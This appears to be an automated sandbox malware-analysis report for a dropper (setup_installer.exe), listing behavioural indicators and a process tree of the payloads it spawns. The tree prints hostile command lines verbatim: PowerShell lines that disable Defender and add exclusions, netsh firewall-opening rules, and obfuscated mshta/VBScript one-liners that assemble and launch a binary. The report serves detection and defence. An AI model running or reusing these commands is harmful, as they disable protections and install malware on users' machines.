Fri05b5df5106928d62.exeFri051e1e7444.exepid process 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3344 Fri05b5df5106928d62.exe 3272 Fri051e1e7444.exe 3272 Fri051e1e7444.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
smss.exefoldershare.exepid process 3208 7960 smss.exe 2860 foldershare.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
vZtRm6RPNwcqvnanVev4uQep.exe84B1.exepid process 6472 vZtRm6RPNwcqvnanVev4uQep.exe 7416 84B1.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
Processes:
msedge.exepid process 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe 6884 msedge.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
WinHoster.exe8246734.exepid process 7104 WinHoster.exe 6772 8246734.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exesvchost.exeFri055cc2a6e65.exeFri05890d11cdb13f95e.exepowershell.exepowershell.exelFrV0H5WFY4rYVRYwcn82CIk.exekPBhgOaGQk.exeusXF9zucDbMhT_78yRVLnT_L.exetaskkill.exeWerFault.exeBCleanSoft82.exeJj7boAeoG56W1zy74ULeu0nk.exedescription pid process Token: SeShutdownPrivilege 1348 svchost.exe Token: SeCreatePagefilePrivilege 1348 svchost.exe Token: SeShutdownPrivilege 1348 svchost.exe Token: SeCreatePagefilePrivilege 1348 svchost.exe Token: SeShutdownPrivilege 1348 svchost.exe Token: SeCreatePagefilePrivilege 1348 svchost.exe Token: SeShutdownPrivilege 2392 svchost.exe Token: SeCreatePagefilePrivilege 2392 svchost.exe Token: SeCreateTokenPrivilege 2292 Fri055cc2a6e65.exe Token: SeAssignPrimaryTokenPrivilege 2292 Fri055cc2a6e65.exe Token: SeLockMemoryPrivilege 2292 Fri055cc2a6e65.exe Token: SeIncreaseQuotaPrivilege 2292 Fri055cc2a6e65.exe Token: SeMachineAccountPrivilege 2292 Fri055cc2a6e65.exe Token: SeTcbPrivilege 2292 Fri055cc2a6e65.exe Token: SeSecurityPrivilege 2292 Fri055cc2a6e65.exe Token: SeTakeOwnershipPrivilege 2292 Fri055cc2a6e65.exe Token: SeLoadDriverPrivilege 2292 Fri055cc2a6e65.exe Token: SeSystemProfilePrivilege 2292 Fri055cc2a6e65.exe Token: SeSystemtimePrivilege 2292 Fri055cc2a6e65.exe Token: SeProfSingleProcessPrivilege 2292 Fri055cc2a6e65.exe Token: SeIncBasePriorityPrivilege 2292 Fri055cc2a6e65.exe Token: SeCreatePagefilePrivilege 2292 Fri055cc2a6e65.exe Token: SeCreatePermanentPrivilege 2292 Fri055cc2a6e65.exe Token: SeBackupPrivilege 2292 Fri055cc2a6e65.exe Token: SeRestorePrivilege 2292 Fri055cc2a6e65.exe Token: SeShutdownPrivilege 2292 Fri055cc2a6e65.exe Token: SeDebugPrivilege 2292 Fri055cc2a6e65.exe Token: SeAuditPrivilege 2292 Fri055cc2a6e65.exe Token: SeSystemEnvironmentPrivilege 2292 Fri055cc2a6e65.exe Token: SeChangeNotifyPrivilege 2292 Fri055cc2a6e65.exe Token: SeRemoteShutdownPrivilege 2292 Fri055cc2a6e65.exe Token: SeUndockPrivilege 2292 Fri055cc2a6e65.exe Token: SeSyncAgentPrivilege 2292 Fri055cc2a6e65.exe Token: SeEnableDelegationPrivilege 2292 Fri055cc2a6e65.exe Token: SeManageVolumePrivilege 2292 Fri055cc2a6e65.exe Token: SeImpersonatePrivilege 2292 Fri055cc2a6e65.exe Token: SeCreateGlobalPrivilege 2292 Fri055cc2a6e65.exe Token: 31 2292 Fri055cc2a6e65.exe Token: 32 2292 Fri055cc2a6e65.exe Token: 33 2292 Fri055cc2a6e65.exe Token: 34 2292 Fri055cc2a6e65.exe Token: 35 2292 Fri055cc2a6e65.exe Token: SeDebugPrivilege 3548 Fri05890d11cdb13f95e.exe Token: SeDebugPrivilege 4544 powershell.exe Token: SeDebugPrivilege 4524 powershell.exe Token: SeDebugPrivilege 4272 lFrV0H5WFY4rYVRYwcn82CIk.exe Token: SeRestorePrivilege 3844 kPBhgOaGQk.exe Token: SeBackupPrivilege 3844 kPBhgOaGQk.exe Token: SeRestorePrivilege 5700 usXF9zucDbMhT_78yRVLnT_L.exe Token: SeBackupPrivilege 5700 usXF9zucDbMhT_78yRVLnT_L.exe Token: SeBackupPrivilege 3844 kPBhgOaGQk.exe Token: SeDebugPrivilege 5648 taskkill.exe Token: SeDebugPrivilege 5832 WerFault.exe Token: SeDebugPrivilege 5152 BCleanSoft82.exe Token: SeCreateTokenPrivilege 3948 Jj7boAeoG56W1zy74ULeu0nk.exe Token: SeAssignPrimaryTokenPrivilege 3948 Jj7boAeoG56W1zy74ULeu0nk.exe Token: SeLockMemoryPrivilege 3948 Jj7boAeoG56W1zy74ULeu0nk.exe Token: SeIncreaseQuotaPrivilege 3948 Jj7boAeoG56W1zy74ULeu0nk.exe Token: SeMachineAccountPrivilege 3948 Jj7boAeoG56W1zy74ULeu0nk.exe Token: SeTcbPrivilege 3948 Jj7boAeoG56W1zy74ULeu0nk.exe Token: SeSecurityPrivilege 3948 Jj7boAeoG56W1zy74ULeu0nk.exe Token: SeTakeOwnershipPrivilege 3948 Jj7boAeoG56W1zy74ULeu0nk.exe Token: SeLoadDriverPrivilege 3948 Jj7boAeoG56W1zy74ULeu0nk.exe Token: SeSystemProfilePrivilege 3948 Jj7boAeoG56W1zy74ULeu0nk.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
Processes:
msedge.exeinstaller.exeCalculator.exepid process 3420 6884 msedge.exe 19280 installer.exe 9648 Calculator.exe 9648 Calculator.exe 9648 Calculator.exe 9648 Calculator.exe 9648 Calculator.exe 9648 Calculator.exe 9648 Calculator.exe -
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
Calculator.exepid process 9648 Calculator.exe 9648 Calculator.exe 9648 Calculator.exe 9648 Calculator.exe 9648 Calculator.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3208 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
svchost.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2392 wrote to memory of 4992 2392 svchost.exe MoUsoCoreWorker.exe PID 2392 wrote to memory of 4992 2392 svchost.exe MoUsoCoreWorker.exe PID 3724 wrote to memory of 3180 3724 setup_installer.exe setup_install.exe PID 3724 wrote to memory of 3180 3724 setup_installer.exe setup_install.exe PID 3724 wrote to memory of 3180 3724 setup_installer.exe setup_install.exe PID 3180 wrote to memory of 2100 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2100 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2100 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2252 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2252 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2252 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3328 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3328 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3328 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 4248 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 4248 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 4248 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2696 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2696 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2696 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2796 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2796 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2796 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2996 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2996 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 2996 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3088 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3088 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3088 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3312 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3312 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3312 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 4092 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 4092 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 4092 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3664 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3664 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3664 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 4020 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 4020 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 4020 3180 setup_install.exe cmd.exe PID 4248 wrote to memory of 4972 4248 cmd.exe Fri05beb1e355.exe PID 4248 wrote to memory of 4972 4248 cmd.exe Fri05beb1e355.exe PID 3088 wrote to memory of 4272 3088 cmd.exe Fri0575b7d291a755f8.exe PID 3088 wrote to memory of 4272 3088 cmd.exe Fri0575b7d291a755f8.exe PID 3088 wrote to memory of 4272 3088 cmd.exe Fri0575b7d291a755f8.exe PID 3180 wrote to memory of 1284 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 1284 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 1284 3180 setup_install.exe cmd.exe PID 2996 wrote to memory of 420 2996 cmd.exe Fri05a277b9a3d2.exe PID 2996 wrote to memory of 420 2996 cmd.exe Fri05a277b9a3d2.exe PID 2996 wrote to memory of 420 2996 cmd.exe Fri05a277b9a3d2.exe PID 3180 wrote to memory of 1948 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 1948 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 1948 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3692 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3692 3180 setup_install.exe cmd.exe PID 3180 wrote to memory of 3692 3180 setup_install.exe cmd.exe PID 2696 wrote to memory of 2292 2696 cmd.exe Fri055cc2a6e65.exe PID 2696 wrote to memory of 2292 2696 cmd.exe Fri055cc2a6e65.exe PID 2696 wrote to memory of 2292 2696 cmd.exe Fri055cc2a6e65.exe PID 4020 wrote to memory of 2208 4020 cmd.exe Fri05851d7f13.exe PID 4020 wrote to memory of 2208 4020 cmd.exe Fri05851d7f13.exe PID 4020 wrote to memory of 2208 4020 cmd.exe Fri05851d7f13.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵PID:2100
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵PID:2252
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4544 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05eeb2dae7b88520a.exe3⤵PID:3328
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05eeb2dae7b88520a.exeFri05eeb2dae7b88520a.exe4⤵
- Executes dropped EXE
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\is-V2S7D.tmp\Fri05eeb2dae7b88520a.tmp"C:\Users\Admin\AppData\Local\Temp\is-V2S7D.tmp\Fri05eeb2dae7b88520a.tmp" /SL5="$20086,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05eeb2dae7b88520a.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05eeb2dae7b88520a.exe"C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05eeb2dae7b88520a.exe" /SILENT6⤵
- Executes dropped EXE
PID:480 -
C:\Users\Admin\AppData\Local\Temp\is-RU573.tmp\Fri05eeb2dae7b88520a.tmp"C:\Users\Admin\AppData\Local\Temp\is-RU573.tmp\Fri05eeb2dae7b88520a.tmp" /SL5="$201F8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05eeb2dae7b88520a.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3420 -
C:\Users\Admin\AppData\Local\Temp\is-BK83A.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-BK83A.tmp\postback.exe" ss18⤵
- Executes dropped EXE
PID:5936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05beb1e355.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05beb1e355.exeFri05beb1e355.exe4⤵
- Executes dropped EXE
PID:4972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri055cc2a6e65.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri055cc2a6e65.exeFri055cc2a6e65.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2292 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 16365⤵
- Program crash
PID:5700 -
C:\Users\Admin\Pictures\Adobe Films\usXF9zucDbMhT_78yRVLnT_L.exe"C:\Users\Admin\Pictures\Adobe Films\usXF9zucDbMhT_78yRVLnT_L.exe"6⤵PID:6708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 2047⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2896 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05cc28ce70b.exe3⤵PID:2796
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05cc28ce70b.exeFri05cc28ce70b.exe4⤵
- Executes dropped EXE
PID:4588 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRIPT: cLOse ( CreateoBJeCT( "WSCRipT.shell" ). Run( "CMd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05cc28ce70b.exe"" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if """" == """" for %j IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05cc28ce70b.exe"") do taskkill -f /im ""%~Nxj"" " , 0 ,truE ) )5⤵PID:3068
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05cc28ce70b.exe" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if "" == "" for %j IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05cc28ce70b.exe") do taskkill -f /im "%~Nxj"6⤵PID:5376
-
C:\Users\Admin\AppData\Local\Temp\EiV4.ExeEIv4.Exe /pllbp0ygmDYA7⤵
- Executes dropped EXE
PID:5564 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRIPT: cLOse ( CreateoBJeCT( "WSCRipT.shell" ). Run( "CMd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\EiV4.Exe"" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if ""/pllbp0ygmDYA "" == """" for %j IN ( ""C:\Users\Admin\AppData\Local\Temp\EiV4.Exe"") do taskkill -f /im ""%~Nxj"" " , 0 ,truE ) )8⤵PID:5660
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\EiV4.Exe" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if "/pllbp0ygmDYA " == "" for %j IN ( "C:\Users\Admin\AppData\Local\Temp\EiV4.Exe") do taskkill -f /im "%~Nxj"9⤵PID:5788
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscript: clOSe( creAteOBJECT( "WSCrIPt.sHElL" ).rUn ( "cMD /Q /c EcHo fDuz%RanDOm%hWPV>BPZetK~.NZD & eCho | sEt /P = ""MZ"" > YAnI.V & COPy /Y /b YANI.V + L0YE_.MQ +V3DggE~.P + FAPqTQ.HJ + 51QbM.RF + BPZetK~.NZD W72F~U.S8_ & staRt msiexec /y .\W72F~U.S8_ " , 0 , tRuE ) )8⤵PID:4020
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c EcHo fDuz%RanDOm%hWPV>BPZetK~.NZD & eCho | sEt /P = "MZ" > YAnI.V &COPy /Y /b YANI.V +L0YE_.MQ +V3DggE~.P +FAPqTQ.HJ +51QbM.RF +BPZetK~.NZD W72F~U.S8_ &staRt msiexec /y .\W72F~U.S8_9⤵PID:6172
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>YAnI.V"10⤵PID:4452
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCho "10⤵PID:984
-
C:\Windows\SysWOW64\msiexec.exemsiexec /y .\W72F~U.S8_10⤵
- Loads dropped DLL
PID:1976 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f /im "Fri05cc28ce70b.exe"7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5648 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0575b7d291a755f8.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri0575b7d291a755f8.exeFri0575b7d291a755f8.exe4⤵
- Executes dropped EXE
PID:4272 -
C:\Users\Admin\AppData\Roaming\3611946.exe"C:\Users\Admin\AppData\Roaming\3611946.exe"5⤵PID:5832
-
C:\Users\Admin\AppData\Roaming\6592176.exe"C:\Users\Admin\AppData\Roaming\6592176.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6108 -
C:\Users\Admin\AppData\Roaming\8474982.exe"C:\Users\Admin\AppData\Roaming\8474982.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2168 -
C:\Users\Admin\AppData\Roaming\2536546.exe"C:\Users\Admin\AppData\Roaming\2536546.exe"5⤵PID:6436
-
C:\Users\Admin\AppData\Roaming\907323.exe"C:\Users\Admin\AppData\Roaming\907323.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1944 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05f84fa77402bf.exe3⤵PID:3312
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05f84fa77402bf.exeFri05f84fa77402bf.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05f84fa77402bf.exeC:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05f84fa77402bf.exe5⤵
- Executes dropped EXE
PID:5512 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri053f5694ea31c9a.exe3⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri053f5694ea31c9a.exeFri053f5694ea31c9a.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3304 -
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri053f5694ea31c9a.exeC:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri053f5694ea31c9a.exe5⤵
- Executes dropped EXE
PID:5528 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05b5df5106928d62.exe3⤵PID:3664
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05b5df5106928d62.exeFri05b5df5106928d62.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3344 -
C:\Users\Admin\Pictures\Adobe Films\o6ds5QGxKUUqphYqwpp1NMcj.exe"C:\Users\Admin\Pictures\Adobe Films\o6ds5QGxKUUqphYqwpp1NMcj.exe"5⤵
- Executes dropped EXE
PID:5288 -
C:\Users\Admin\Pictures\Adobe Films\GEmrIdAuJTC4SU6UyNpLIyk4.exe"C:\Users\Admin\Pictures\Adobe Films\GEmrIdAuJTC4SU6UyNpLIyk4.exe"5⤵
- Executes dropped EXE
PID:4980 -
C:\Users\Admin\Pictures\Adobe Films\6fDHT2tUxULVjUTvpyzQ9uGY.exe"C:\Users\Admin\Pictures\Adobe Films\6fDHT2tUxULVjUTvpyzQ9uGY.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:4084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\6⤵PID:5612
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵PID:7440
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵PID:7964
-
C:\Users\Admin\Pictures\Adobe Films\x5yjjKUdFt2OAlDQL7_fYMPj.exe"C:\Users\Admin\Pictures\Adobe Films\x5yjjKUdFt2OAlDQL7_fYMPj.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4844 -
C:\Users\Admin\Pictures\Adobe Films\oJRm70Dm9j5lSYZ6MOMZucpS.exe"C:\Users\Admin\Pictures\Adobe Films\oJRm70Dm9j5lSYZ6MOMZucpS.exe"5⤵
- Executes dropped EXE
PID:5772 -
C:\Users\Admin\Pictures\Adobe Films\usXF9zucDbMhT_78yRVLnT_L.exe"C:\Users\Admin\Pictures\Adobe Films\usXF9zucDbMhT_78yRVLnT_L.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5700 -
C:\Users\Admin\Pictures\Adobe Films\HCXOFRiAMR5KOhUwU_ppv7b9.exe"C:\Users\Admin\Pictures\Adobe Films\HCXOFRiAMR5KOhUwU_ppv7b9.exe"5⤵PID:5184
-
C:\Users\Admin\Documents\NMFjg_8YMS00zgFHgzMpsI3R.exe"C:\Users\Admin\Documents\NMFjg_8YMS00zgFHgzMpsI3R.exe"6⤵PID:2624
-
C:\Users\Admin\Pictures\Adobe Films\hdHYHygrA9P_9sJLNGkiqc6P.exe"C:\Users\Admin\Pictures\Adobe Films\hdHYHygrA9P_9sJLNGkiqc6P.exe"7⤵PID:5468
-
C:\Users\Admin\Pictures\Adobe Films\SEdbjWMsrv726vIkSIBsE9Go.exe"C:\Users\Admin\Pictures\Adobe Films\SEdbjWMsrv726vIkSIBsE9Go.exe" /mixtwo7⤵PID:3060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 2568⤵
- Program crash
PID:7568 -
C:\Users\Admin\Pictures\Adobe Films\d6sHYV6XlWgpQzAIDX6Lbn0g.exe"C:\Users\Admin\Pictures\Adobe Films\d6sHYV6XlWgpQzAIDX6Lbn0g.exe"7⤵PID:1332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 2568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8096 -
C:\Users\Admin\Pictures\Adobe Films\6xMN6qpuEr9zi2l7O2Z_5f9r.exe"C:\Users\Admin\Pictures\Adobe Films\6xMN6qpuEr9zi2l7O2Z_5f9r.exe"7⤵PID:3716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 17288⤵
- Executes dropped EXE
- Program crash
- Enumerates system info in registry
PID:5184 -
C:\Users\Admin\Pictures\Adobe Films\56H5vZWH3BEIS0MYbnsB5sVm.exe"C:\Users\Admin\Pictures\Adobe Films\56H5vZWH3BEIS0MYbnsB5sVm.exe"7⤵PID:6576
-
C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe"C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe"7⤵PID:6252
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:7956
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:876
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
